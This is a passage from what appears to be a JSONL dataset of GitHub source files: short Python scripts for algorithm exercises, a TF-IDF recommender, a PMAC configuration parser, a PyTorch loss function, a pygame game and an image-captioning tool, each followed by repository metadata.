> myQualityModel.complexity_max_value:\r\n                weightedScore -= myQualityModel.complexity_penalty\r\n                print (\"   Score is too low --> PENALTY [-\", myQualityModel.complexity_penalty, \"] applied.\")\r\n\r\n            print (\"   Complexity Code Metric Weight is \", myQualityModel.complexity_weight, \" and Score is \", score)\r\n            print (\"   Final Complexity Rated score (Weighted) is: \", weightedScore)\r\n            print (\" \")\r\n            return weightedScore\r\n        except Exception as e:\r\n            print (\"Error in QualityRateEvaluator.calculateComplexityRate: \", e)\r\n            raise ValueError\r\n","repo_name":"overflow15/sonarqube-influxdb","sub_path":"python/qualityRateEvaluator.py","file_name":"qualityRateEvaluator.py","file_ext":"py","file_size_in_byte":20729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40143710936","text":"\"\"\"\nThis problem was asked by Dropbox.\nGiven the root to a binary search tree, find the second largest node in the tree.\n\n=========================== \n\n          10     root\n        /     \\ \n      7        18\n    /   \\     /   \\ \n   6     9  16     19  * second largest\n  /                  \\ \n3                     20   largest node\n\nOutput: 19\n=============================\n\n      10    root and largest node\n     / \n    7 \n  /   \\ \n 6     9   * second largest \n/ \n3\n\nOutput: 9\n\"\"\"\n\nclass TreeNode:\n\n    def __init__(self, value: int) -> None:\n        self.value = value\n        self.left = None\n        self.right = None\n\n    def __str__(self) -> str:\n        return f\"{self.value}\"\n\n\ndef find_second_largest(node: TreeNode) -> int:\n    # Walk down to the rightmost (largest) node, remembering its parent.\n    current, parent = node, None\n    while current.right:\n        parent = current\n        current = current.right\n\n    # If the largest node has a left subtree, the second largest value is the\n    # rightmost node of that subtree; otherwise it is the largest node's parent.\n    if current.left:\n        current = current.left\n        while current.right:\n            current = current.right\n        return current.value\n\n    return parent.value\n\n# Bst root\nnode = TreeNode(10)\n\n# Left subtree\nnode.left = TreeNode(7)\nnode.left.right = TreeNode(9) # Second largest in Bst if no right subtree exists.\nnode.left.left = TreeNode(6)\nnode.left.left.left = TreeNode(3)\n\n# Right subtree\nnode.right = TreeNode(18)\nnode.right.left = TreeNode(16)\nnode.right.right 
= TreeNode(19) # Second largest in Bst if right subtree exist.\nnode.right.right.right = TreeNode(20)\n\nprint(find_second_largest(node)) \n","repo_name":"guillsav/Technical-Practice","sub_path":"second-largest-in-bst/second-largest.py","file_name":"second-largest.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37197743923","text":"# Import Pandas\nimport pandas as pd\n\n# Import TfIdfVectorizer from scikit-learn\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\n# Import linear_kernel\nfrom sklearn.metrics.pairwise import linear_kernel\n\nimport json # for testing\nimport clean_info as ci \nimport model_selection as ms \n\n# Define a TF-IDF Vectorizer Object. Remove all english stop words such as 'the', 'a'\ntfidf = TfidfVectorizer(token_pattern=u'(?ui)\\\\b\\\\w*[a-z]+\\\\w*\\\\b', stop_words='english')\n\n# features\n# features = ['Name', 'Major','Class 1','Class 2','Class 3','Class 4','Interest 1','Interest 2','Interest 3','Hometown','Hometype']\n# weights = {'Name': 0, 'Major': 30, 'Class 1': 20, 'Class 2': 20, 'Class 3': 20, 'Class 4': 20, 'Interest 1': 12, 'Interest 2': 12, 'Interest 3': 12, 'Hometown': 18, 'Hometype': 0}\nfeatures = ['Name','Gender','Major','Grad Year','Class 1','Class 2','Class 3','Class 4','Interest 1','Interest 2','Study Habits','Hometown','Campus Location','Race','Preferences']\nc_weight = 16\ni_weight = 8\nweights = {'Name': 0, 'Gender': 0, 'Major': 5, 'Grad Year': 7, \n 'Class 1': c_weight, 'Class 2': c_weight, 'Class 3': c_weight, 'Class 4': c_weight, \n 'Interest 1': i_weight, 'Interest 2': i_weight, \n 'Study Habits': 11, 'Hometown': 3, 'Campus Location': 10, 'Race': 0, 'Preferences': 0}\n\n# S = 1.8 C, L = 1.5 C, I = 0.8 C, H = 0.6 C, G = 0.5 C, M = 0.3 C\n# weights = {'Name': 0, 'Gender': 0, 'Major': 5, 'Grad Year': 7, 'Class 1': 10, 'Class 2': 10, 'Class 3': 10, 'Class 4': 10, 'Interest 1': 6, 'Interest 2': 6, 'Study Habits': 15, 'Hometown': 3, 'Campus Location': 14, 'Race': 0, 'Preferences': 0}\n\nprimary = 'Name'\n# groupby = 'Race'\ngroupby = None\n\nnum = 3\n# csv = 'Test Classes Extended.csv'\ncsv = 'Prof Clarkson Test Data - Sheet1 (1).csv'\n# csv = 'ProfileInfo.csv'\n# use_model = True \nuse_model = False \nreplace_list = ['Interest 1','Interest 2']\ndo_random = False \nrand_num = 3\n\n# minimize number of global variables\ndef convert_csv_to_matrix(csv, num):\n # Load data from csv\n metadata = pd.read_csv(csv)\n m0 = metadata[features]\n\n for feature in replace_list:\n m0[feature] = m0[feature].apply(ci.key_replace)\n \n m0 = m0.reset_index()\n group_dict = {}\n matches = pd.DataFrame(columns=features + ['index'])\n ones = []\n\n def func_pairs(group):\n # apply clean_df function to features\n m1 = group.copy()\n m1 = ci.clean_df(m1, features, primary)\n \n if use_model:\n cosine_sim = ms.construct_similarity(m1)\n else:\n # BEGINNING ------------------------------------------------------------\n m1 = m1.assign(score = [''] * len(m1))\n for feature in features:\n if feature in weights:\n for i in range(weights[feature]):\n m1['score'] = m1['score'] + \" \" + m1[feature]\n else:\n m1['score'] = m1['score'] + \" \" + m1[feature]\n \n #Construct the required TF-IDF matrix by fitting and transforming the data\n tfidf_matrix = tfidf.fit_transform(m1['score'])\n\n # Compute the cosine similarity matrix\n cosine_sim = linear_kernel(tfidf_matrix, tfidf_matrix)\n # END 
-----------------------------------------------------------------\n        \n        #Construct a reverse map of indices and employee names\n        indices = pd.Series(group.index, index=group['index']).drop_duplicates()\n\n        return get_pairs(group['index'].sample(frac=1), indices, cosine_sim, group, num)\n\n    if groupby is not None:\n        courses = m0[groupby].unique() # list of all unique department names\n        \n        for course in courses:\n            group = (m0[m0[groupby] == course]).reset_index().drop('level_0', axis=1)\n            # keep track of groups with only one member\n\n            if len(group) == 1:\n                ones.append(group)\n            else:\n                matches = pd.concat([matches, func_pairs(group)], sort=False)\n        \n        if len(ones) != 0:\n            if len(ones) == 1:\n                for match in matches:\n                    if len(ones) == 0: break\n                    else:\n                        while len(match) < num:\n                            if len(ones) != 0:\n                                match.append(ones.pop(0)[primary])\n                            else: break\n                if len(ones) > 0:\n                    matches[0].append(ones.pop(0))\n            else:\n                df = pd.DataFrame(columns=features + ['index'])\n                \n                for one in ones:\n                    df = df.append(one, sort=False)\n                df = df.reset_index().drop('level_0', axis=1)\n                matches = pd.concat([matches, func_pairs(df)], sort=False)\n    else:\n        matches = func_pairs(m0)\n    \n    return matches\n\n# Function that takes an employee name as input and outputs the most similar employees\ndef get_recommendations(name, indices, cosine_sim, list_to_remove, m0):\n    # Get the index of the employee that matches the name\n    idx = indices[name]\n\n    # Get the pairwise similarity scores of all employees with that employee\n    sim_scores = list(enumerate(cosine_sim[idx]))\n    \n    # Sort the employees based on the similarity scores\n    sim_scores = sorted(sim_scores, key=lambda x: x[1], reverse=True)\n\n    # Get the employee indices\n    emp_indices = []\n    emp_sims = []\n    for i in sim_scores:\n        if (len(emp_indices) == rand_num): break\n        if i[0] not in list_to_remove and i[0] != idx:\n            emp_indices.append(i[0])\n            emp_sims.append(i[1])\n\n    # Return the most similar employees not already paired\n    result = m0.iloc[emp_indices]\n    result = result.assign(Similarity = emp_sims) # still need this?\n    return result \n\nimport random \ndef get_random(mylist, num): # num = number of people per group\n    if (len(mylist) >= num):\n        inds = list(mylist.index)\n        result = pd.DataFrame(columns=features)\n        if do_random:\n            rand_inds = random.sample(inds, num-1)\n            for i in rand_inds:\n                result = pd.concat([result, mylist[mylist.index == i]], sort=False)\n        else:\n            for i in range(0, num-1):\n                result = pd.concat([result, mylist[mylist.index == inds[i]]], sort=False)\n    else:\n        result = mylist\n    return result\n\n# semi-greedy algorithm\ndef get_pairs(emplist, indices, cosine_sim, m0, num):\n    pairs = pd.DataFrame(columns=features + ['index'])\n    list_to_remove = []\n    \n    for e in emplist:\n        if indices[e] not in list_to_remove:\n            partner = list(get_random(get_recommendations(e, indices, cosine_sim, list_to_remove, m0), num)['index'])\n            name0 = m0[m0['index'] == e].iloc[0]\n            pairs = pairs.append(m0[m0['index'] == e].iloc[0])\n            \n            list_to_remove.append(indices[e])\n            for p in partner:\n                pairs = pairs.append(m0[m0['index'] == p].iloc[0])\n                list_to_remove.append(indices[p])\n\n    data = [['-'] * (len(features)+1)]\n    data2 = [['+'] * (len(features)+1)]\n    extra = pd.DataFrame(data, columns=features + ['index'])\n    extra2 = pd.DataFrame(data2, columns=features + ['index'])\n    pairs = pd.concat([pairs, extra, extra2], sort=False)\n    \n    list_to_remove.sort(reverse=True)\n    return pairs\n\ndf = convert_csv_to_matrix(csv, num)\nprint(df)\n# print(\"Done\")\ndf.to_csv('testing.csv', 
index=False)","repo_name":"ALai2/AWS-Flask-ML-App","sub_path":"recommender/work_with_duplicates.py","file_name":"work_with_duplicates.py","file_ext":"py","file_size_in_byte":7536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5450159417","text":"import getopt\nimport logging\nimport sys\nfrom typing import Dict\n\nfrom dls_pmacanalyse import __version__\nfrom dls_pmacanalyse.errors import ArgumentError, ConfigError\nfrom dls_pmacanalyse.pmac import Pmac\nfrom dls_pmacanalyse.pmacparser import PmacParser\nfrom dls_pmacanalyse.pmacvariables import (\n PmacIVariable,\n PmacMsIVariable,\n PmacMVariable,\n PmacPVariable,\n PmacQVariable,\n)\n\nlog = logging.getLogger(__name__)\n\n\nclass GlobalConfig(object):\n \"\"\"A single instance of this class contains the global configuration.\"\"\"\n\n def __init__(self):\n \"\"\"Constructor.\"\"\"\n self.verbose = False\n self.backupDir = None\n self.writeAnalysis = True\n self.comments = False\n self.configFile = None\n self.resultsDir = \"pmacAnalysis\"\n self.onlyPmacs = None\n self.includePaths = None\n self.checkPositions = False\n self.debug = False\n self.fixfile = None\n self.unfixfile = None\n self.pmacs: Dict[str, Pmac] = {}\n\n def createOrGetPmac(self, name: str):\n if name not in self.pmacs:\n self.pmacs[name] = Pmac(name)\n return self.pmacs[name]\n\n def processArguments(self):\n \"\"\"Process the command line arguments. Returns False\n if the program is to print(the help and exit.\"\"\"\n try:\n opts, args = getopt.gnu_getopt(\n sys.argv[1:],\n \"vh\",\n [\n \"help\",\n \"verbose\",\n \"backup=\",\n \"pmac=\",\n \"ts=\",\n \"tcpip=\",\n \"geobrick\",\n \"vmepmac\",\n \"reference=\",\n \"comparewith=\",\n \"resultsdir=\",\n \"nocompare=\",\n \"only=\",\n \"include=\",\n \"nofactorydefs\",\n \"macroics=\",\n \"checkpositions\",\n \"debug\",\n \"comments\",\n \"fixfile=\",\n \"unfixfile=\",\n \"loglevel=\",\n \"version\",\n ],\n )\n except getopt.GetoptError as err:\n raise ArgumentError(str(err))\n globalPmac = Pmac(\"global\")\n curPmac = None\n for o, a in opts:\n if o in (\"-h\", \"--help\"):\n return False\n elif o in (\"-v\", \"--verbose\"):\n self.verbose = True\n elif o == \"--backup\":\n self.backupDir = a\n elif o == \"--comments\":\n self.comments = True\n elif o == \"--pmac\":\n curPmac = self.createOrGetPmac(a)\n curPmac.copyNoComparesFrom(globalPmac)\n elif o == \"--ts\":\n parts = a.split(\":\")\n if len(parts) != 2:\n raise ArgumentError(\"Bad terminal server argument\")\n elif curPmac is None:\n raise ArgumentError(\"No PMAC yet defined\")\n else:\n curPmac.setProtocol(parts[0], parts[1], True)\n elif o == \"--tcpip\":\n parts = a.split(\":\")\n if len(parts) != 2:\n raise ArgumentError(\"Bad TCP/IP argument\")\n elif curPmac is None:\n raise ArgumentError(\"No PMAC yet defined\")\n else:\n curPmac.setProtocol(parts[0], parts[1], False)\n elif o == \"--geobrick\":\n if curPmac is None:\n raise ArgumentError(\"No PMAC yet defined\")\n else:\n curPmac.setGeobrick(True)\n elif o == \"--debug\":\n self.debug = True\n elif o == \"--vmepmac\":\n if curPmac is None:\n raise ArgumentError(\"No PMAC yet defined\")\n else:\n curPmac.setGeobrick(False)\n elif o == \"--nofactorydefs\":\n if curPmac is None:\n raise ArgumentError(\"No PMAC yet defined\")\n else:\n curPmac.setNoFactoryDefs()\n elif o == \"--reference\":\n if curPmac is None:\n raise ArgumentError(\"No PMAC yet defined\")\n else:\n curPmac.setReference(a)\n elif o == \"--fixfile\":\n self.fixfile = a\n elif o 
== \"--unfixfile\":\n self.unfixfile = a\n elif o == \"--comparewith\":\n if curPmac is None:\n raise ArgumentError(\"No PMAC yet defined\")\n else:\n curPmac.setCompareWith(a)\n elif o == \"--resultsdir\":\n self.resultsDir = a\n elif o == \"--nocompare\":\n parser = PmacParser(a, None)\n (type, nodeList, start, count, increment) = parser.parseVarSpec()\n while count > 0:\n var = self.makeVars(type, nodeList, start)\n if curPmac is None:\n globalPmac.setNoCompare(var)\n else:\n curPmac.setNoCompare(var)\n start += increment\n count -= 1\n elif o == \"--compare\":\n if curPmac is None:\n raise ArgumentError(\"No PMAC yet defined\")\n else:\n parser = PmacParser(a, None)\n (type, nodeList, start, count, increment) = parser.parseVarSpec()\n while count > 0:\n var = self.makeVars(type, nodeList, start)\n curPmac.clearNoCompare(var)\n start += increment\n count -= 1\n elif o == \"--only\":\n if self.onlyPmacs is None:\n self.onlyPmacs = []\n self.onlyPmacs.append(a)\n elif o == \"--include\":\n self.includePaths = a\n elif o == \"--macroics\":\n if curPmac is None:\n raise ArgumentError(\"No PMAC yet defined\")\n else:\n curPmac.setNumMacroStationIcs(int(a))\n elif o == \"--checkpositions\":\n self.checkPositions = True\n elif o == \"--loglevel\":\n numeric_level = getattr(logging, str(a).upper(), None)\n log.setLevel(numeric_level)\n elif o == \"--version\":\n print(__version__)\n exit(0)\n if len(args) > 1:\n raise ArgumentError(\"Too many arguments.\")\n if len(args) == 1:\n self.configFile = args[0]\n return True\n\n def processConfigFile(self):\n \"\"\"Process the configuration file.\"\"\"\n if self.configFile is None:\n return\n file = open(self.configFile, \"r\")\n if file is None:\n raise ConfigError(\"Could not open config file: %s\" % self.configFile)\n globalPmac = Pmac(\"global\")\n curPmac = None\n for line in file:\n words = line.split(\";\", 1)[0].strip().split()\n if len(words) >= 1:\n if words[0].lower() == \"pmac\" and len(words) == 2:\n curPmac = self.createOrGetPmac(words[1])\n curPmac.copyNoComparesFrom(globalPmac)\n elif (\n words[0].lower() == \"ts\" and len(words) == 3 and curPmac is not None\n ):\n curPmac.setProtocol(words[1], int(words[2]), True)\n elif (\n words[0].lower() == \"tcpip\"\n and len(words) == 3\n and curPmac is not None\n ):\n curPmac.setProtocol(words[1], int(words[2]), False)\n elif (\n words[0].lower() == \"geobrick\"\n and len(words) == 1\n and curPmac is not None\n ):\n curPmac.setGeobrick(True)\n elif (\n words[0].lower() == \"nofactorydefs\"\n and len(words) == 1\n and curPmac is not None\n ):\n curPmac.setNoFactoryDefs()\n elif (\n words[0].lower() == \"reference\"\n and len(words) == 2\n and curPmac is not None\n ):\n curPmac.setReference(words[1])\n elif (\n words[0].lower() == \"comparewith\"\n and len(words) == 2\n and curPmac is not None\n ):\n curPmac.setCompareWith(words[1])\n elif words[0].lower() == \"resultsdir\" and len(words) == 2:\n self.resultsDir = words[1]\n elif words[0].lower() == \"include\" and len(words) == 2:\n self.includePaths = words[1]\n elif words[0].lower() == \"backup\" and len(words) == 2:\n self.backupDir = words[1]\n elif words[0].lower() == \"comments\" and len(words) == 1:\n self.comments = True\n elif words[0].lower() == \"nocompare\" and len(words) == 2:\n parser = PmacParser([words[1]], None)\n (type, nodeList, start, count, increment) = parser.parseVarSpec()\n while count > 0:\n var = self.makeVars(type, nodeList, start)\n if curPmac is None:\n globalPmac.setNoCompare(var)\n else:\n 
curPmac.setNoCompare(var)\n start += increment\n count -= 1\n elif (\n words[0].lower() == \"compare\"\n and len(words) == 2\n and curPmac is not None\n ):\n parser = PmacParser([words[1]], None)\n (type, nodeList, start, count, increment) = parser.parseVarSpec()\n while count > 0:\n var = self.makeVars(type, nodeList, start)\n curPmac.clearNoCompare(var)\n start += increment\n count -= 1\n elif (\n words[0].lower() == \"macroics\"\n and len(words) == 2\n and curPmac is not None\n ):\n curPmac.setNumMacroStationIcs(int(words[1]))\n else:\n raise ConfigError(\"Unknown configuration: %s\" % repr(line))\n\n def makeVars(self, varType, nodeList, n):\n \"\"\"Makes a variable of the correct type.\"\"\"\n result = []\n if varType == \"i\":\n result.append(PmacIVariable(n))\n elif varType == \"p\":\n result.append(PmacPVariable(n))\n elif varType == \"m\":\n result.append(PmacMVariable(n))\n elif varType == \"ms\":\n for ms in nodeList:\n result.append(PmacMsIVariable(ms, n))\n elif varType == \"&\":\n for cs in nodeList:\n result.append(PmacQVariable(cs, n))\n else:\n raise ConfigError(\"Cannot decode variable type %s\" % repr(varType))\n return result\n","repo_name":"DiamondLightSource/dls-pmac-analyse","sub_path":"src/dls_pmacanalyse/globalconfig.py","file_name":"globalconfig.py","file_ext":"py","file_size_in_byte":11445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10915343779","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom Dist import Dist\n\ndef mixup_criterion(pred, y_a, y_b, lam):\n return lam * F.cross_entropy(pred, y_a) + (1 - lam) * F.cross_entropy(pred, y_b)\n\ndef mse_loss(pred, y_a, y_b, lam):\n return lam * (F.mse_loss(pred, y_a) / 2) + (1 - lam) * (F.mse_loss(pred, y_b) / 2)\n\nclass GCPLoss(nn.CrossEntropyLoss):\n def __init__(self, **options):\n super(GCPLoss, self).__init__()\n self.weight_pl = options['weight_pl']\n self.temp = options['temp']\n self.Dist = Dist(num_classes=options['num_classes'], feat_dim=options['feat_dim']) # \n\n def forward(self, x, y, labels=None, targets_a=None, targets_b=None, lam=None, mixup=0):\n dist = self.Dist(x)\n logits = F.softmax(-dist, dim=1)\n if labels is None: return logits, 0\n\n if mixup == 0:\n loss = F.cross_entropy(-dist / self.temp, labels)\n center_batch = self.Dist.centers[labels, :]\n loss_r = F.mse_loss(x, center_batch) / 2\n\n elif mixup == 1:\n loss = mixup_criterion(-dist, targets_a, targets_b, lam)\n center_batch_a = self.Dist.centers[targets_a, :]\n center_batch_b = self.Dist.centers[targets_b, :]\n loss_r = mse_loss(x, center_batch_a, center_batch_b, lam)\n\n loss = loss + self.weight_pl * loss_r\n return logits, loss","repo_name":"DevD1092/ood-skin-lesion","sub_path":"GCPLoss.py","file_name":"GCPLoss.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"18481009125","text":"class Solution:\n def findCircleNum(self, isConnected: [[int]]) -> int:\n province_count = 0\n self.visited = set()\n \n for i in range(len(isConnected)):\n if i not in self.visited:\n self.province_dfs(i, isConnected)\n province_count += 1\n \n return province_count\n \n \n def province_dfs(self, i: int, isConnected: [[int]]):\n self.visited.add(i)\n for j in range(len(isConnected)):\n if j not in self.visited and i != j and isConnected[i][j] == 1:\n self.province_dfs(j, isConnected)\n \n return\n 
","repo_name":"thydrdy/competitive_programming","sub_path":"leetcode/number of provinces.py","file_name":"number of provinces.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71129544836","text":"import sys\nn = int(sys.stdin.readline())\nstack = []\nresult = []\ncurrent = 1\n\nfor _ in range(n):\n x = int(input())\n while len(stack) == 0 or stack[-1] < x:\n stack.append(current)\n current += 1\n result.append('+')\n if stack[-1] == x:\n stack.pop()\n result.append('-')\n else:\n result = ['No']\n break\n\nfor x in result:\n print(x)\n","repo_name":"jiseungmin/Algorithm","sub_path":"Internet lecture/Algorithm_BaekJoon/스택수열.py","file_name":"스택수열.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32518179636","text":"import pandas as pd\nfrom datetime import datetime, timedelta\nimport sys\npd.set_option('display.max_columns', None)\npd.set_option('display.max_rows', None)\nr=pd.read_csv(\"drug_exposure.csv\")\ns=r.loc[:,[\"person_id\",\"drug_concept_id\",\"drug_exposure_start_date\",\"drug_exposure_end_date\"]]\nf=s[s[\"person_id\"].isin([\"1891866\"])]\nla=pd.DatetimeIndex(f[\"drug_exposure_end_date\"])-pd.DatetimeIndex(f[\"drug_exposure_start_date\"])\nnew=f.assign(days = la)\nlast=new.sort_values('days',ascending=False)\ndel last['days']\nsys.stdout=open('4답.txt','w')\nprint(last)\n\n\n\n\n\n\n","repo_name":"crownbrown1/data","sub_path":"4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23616609171","text":"s=open('B.in').read()\nout=open('B.out','w')\na=s.split('\\n')[1:]\nfor ia in xrange(len(a)):\n if not a[ia]: continue\n d=a[ia].split()\n nc=int(d[0])\n ct = d[1:nc+1]\n c=[]\n for i in ct:\n c.append(i)\n c.append(i[1]+i[0]+i[2])\n no = int(d[nc+1])\n ot = d[nc+2:nc+no+2]\n o=list()\n for i in ot:\n o.append(i)\n o.append(i[1]+i[0]) \n l=list(d[-1])\n h=list()\n h.append(l[0])\n for j in l[1:]:\n 'print j,h'\n for co in c:\n if h:\n if h[-1]==co[0] and j==co[1]:\n h[-1]=co[2]\n break\n else:\n for oo in o:\n if(oo[0]==j and oo[1] in h):\n h=[]\n break\n else:\n h.append(j)\n out.write('Case #{0}: '.format(ia+1)+str(h).replace('\\'','')+'\\n')\nout.close()\n \n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_75/1183.py","file_name":"1183.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18700997265","text":"# Brian Bowles, Assignment 6, February 28, 2015.\nimport os,sys\nimport pygame\n\nPLAYER = 'smallface.png'\nFALCON = 'falcon.png'\n\nGREEN = (0, 255, 0)\n\nclass Box(pygame.sprite.Sprite):\n def __init__(self,image_file,location):\n self.image = pygame.image.load(image_file).convert()\n self.rect = self.image.get_rect()\n self.rect.topleft = location\n self.speed = 3\n\n def move(self):\n self.rect.x += self.speed\n \n if self.rect.right > 640:\n self.speed *= -1\n if self.rect.left < 0:\n self.speed *= -1\n\nclass Player(pygame.sprite.Sprite):\n def __init__(self, location, speed, image_file):\n self.image = pygame.image.load(image_file).convert_alpha()\n self.speed = speed\n self.rect = self.image.get_rect()\n self.rect.topleft = location\n self.keydownA = False\n self.keydownD = False\n self.keydownS = False\n 
self.keydownW = False\n\n def detectMoving(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit();sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_a:\n self.keydownA = True\n if event.key == pygame.K_d:\n self.keydownD = True\n if event.key == pygame.K_s:\n self.keydownS = True\n if event.key == pygame.K_w:\n self.keydownW = True\n if event.key == pygame.K_q:\n pygame.quit();sys.exit()\n\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_a:\n self.keydownA = False\n if event.key == pygame.K_d:\n self.keydownD = False\n if event.key == pygame.K_s:\n self.keydownS = False\n if event.key == pygame.K_w:\n self.keydownW = False\n\n def move(self):\n if self.keydownA == True and self.rect.left > 0:\n self.rect.x -= self.speed\n if self.keydownD == True and self.rect.right < 640:\n self.rect.x += self.speed\n if self.keydownW == True and self.rect.top > 0 :\n self.rect.y -= self.speed\n if self.keydownS == True and self.rect.bottom < 480:\n self.rect.y += self.speed\n \nclass Control:\n def __init__(self):\n self.falcon1 = Box(FALCON,(400,200))\n self.falcon2 = Box(FALCON,(400,25))\n self.falcon3 = Box(FALCON,(400,375))\n self.player = Player([250,350], 3, PLAYER)\n self.hits = 0\n self.message = \"HITS: \"\n self.font = pygame.font.Font(None, 30)\n self.text = self.font.render(self.message, 1, (0, 0, 255))\n self.isColliding = False\n SCREEN.blit(self.text, (300, 0))\n \n def main(self):\n self.player.detectMoving()\n self.player.move()\n self.falcon1.move()\n self.falcon2.move()\n self.falcon3.move()\n SCREEN.fill(GREEN)\n SCREEN.blit(self.falcon1.image, self.falcon1.rect)\n SCREEN.blit(self.falcon2.image, self.falcon2.rect)\n SCREEN.blit(self.falcon3.image, self.falcon3.rect)\n SCREEN.blit(self.player.image, self.player.rect)\n\n if self.player.rect.colliderect(self.falcon1.rect):\n if self.isColliding == False:\n self.hits = self.hits + 1\n self.isColliding = True\n elif self.player.rect.colliderect(self.falcon2.rect):\n if self.isColliding == False:\n self.hits = self.hits + 1\n self.isColliding = True\n elif self.player.rect.colliderect(self.falcon3.rect):\n if self.isColliding == False:\n self.hits = self.hits + 1\n self.isColliding = True\n else:\n self.isColliding = False\n self.text = self.font.render(self.message + \" \" + str(self.hits), 1, (0, 0, 255))\n SCREEN.blit(self.text, (320, 0))\n pygame.display.flip()\n\nif __name__ == \"__main__\":\n os.environ['SDL_VIDEO_CENTERED'] = '1'\n pygame.init()\n pygame.display.set_caption(\"Brian's Collision Detection Game\")\n SCREEN = pygame.display.set_mode((640, 480))\n \n run = Control()\n clock = pygame.time.Clock()\n while 1:\n run.main()\n clock.tick(64)\n","repo_name":"bowles123/CS-3430-Projects","sub_path":"Assignment6/collision.py","file_name":"collision.py","file_ext":"py","file_size_in_byte":4422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4986688560","text":"# # import requests\n# # from PIL import Image\n# # from transformers import BlipProcessor, BlipForConditionalGeneration\n# # from PIL import Image\n# # from TTS import capture_image\n\n\n# # def local_image_to_pil(path):\n# # img = Image.open(path).convert('RGB')\n# # return img\n\n\n# # local_model_dir = 'C:/Users/jukas/Desktop/LangChain/hackathon/captions'\n\n# # processor = BlipProcessor.from_pretrained(local_model_dir)\n# # model = BlipForConditionalGeneration.from_pretrained(local_model_dir)\n\n\n# # img_path =capture_image()\n\n# # # 
replace with your actual image path\n# # img_url = local_image_to_pil(img_path)\n# # raw_image = img_url\n\n\n# # # raw_image = Image.open(requests.get(img_url, stream=True).raw).convert('RGB')\n\n# # # conditional image captioning\n# # text = \"a photography of\"\n# # inputs = processor(raw_image, text, return_tensors=\"pt\")\n\n# # out = model.generate(**inputs)\n# # print(processor.decode(out[0], skip_special_tokens=True))\n# # # >>> a photography of a woman and her dog\n\n# # # unconditional image captioning\n# # inputs = processor(raw_image, return_tensors=\"pt\")\n\n# # out = model.generate(**inputs)\n# # print(processor.decode(out[0], skip_special_tokens=True))\n# # # >>> a woman sitting on the beach with her dog\n\n\n# import requests\n# from PIL import Image\n# from transformers import BlipProcessor, BlipForConditionalGeneration\n# from TTS import capture_image, speak\n\n\n# def local_image_to_pil(path):\n# img = Image.open(path).convert('RGB')\n# return img\n\n\n# def generate_image_captions():\n# local_model_dir = 'C:/Users/jukas/Desktop/LangChain/hackathon/captions'\n\n# try:\n# processor = BlipProcessor.from_pretrained(local_model_dir)\n# model = BlipForConditionalGeneration.from_pretrained(local_model_dir)\n\n# img_path = capture_image()\n# img_url = local_image_to_pil(img_path)\n# raw_image = img_url\n\n# text = \"a photography of\"\n# inputs = processor(raw_image, text, return_tensors=\"pt\")\n\n# out = model.generate(**inputs)\n# caption = processor.decode(out[0], skip_special_tokens=True)\n# print(caption)\n\n# speak(\"Caption generated: \" + caption)\n\n\n# user_approval = input(\"Do you want to retake the image? (Yes/No): \")\n# if user_approval.lower() in [\"yes\", \"y\"]:\n# generate_image_captions()\n\n# except Exception as e:\n# speak(\"An error occurred: \" + str(e))\n# user_approval = input(\"Do you want to retake the image? (Yes/No): \")\n# if user_approval.lower() in [\"yes\", \"y\"]:\n# generate_image_captions()\n# else:\n# speak(\"Caption generation failed.\")\n\n\n# generate_image_captions()\n\n\nimport requests\nfrom PIL import Image\nfrom transformers import BlipProcessor, BlipForConditionalGeneration\nfrom TTS import capture_image, speak\nfrom langchain import OpenAI, LLMChain, PromptTemplate\nfrom langchain.memory import ConversationBufferWindowMemory\nimport speech_recognition as sr\nimport os\nfrom dotenv import find_dotenv, load_dotenv\n\ndotenv_path= find_dotenv()\nload_dotenv(dotenv_path)\nOPENAI_API_KEY = os.getenv(\"OPENAI_API_KEY\")\nos.environ[\"OPENAI_API_KEY\"] = OPENAI_API_KEY\n\ndef _approve(_input: str) -> bool:\n r = sr.Recognizer()\n with sr.Microphone() as source:\n r.adjust_for_ambient_noise(source)\n r.energy_threshold = 200\n r.pause_threshold = 0.5\n msg = (\n \"Do you approve of the following input? 
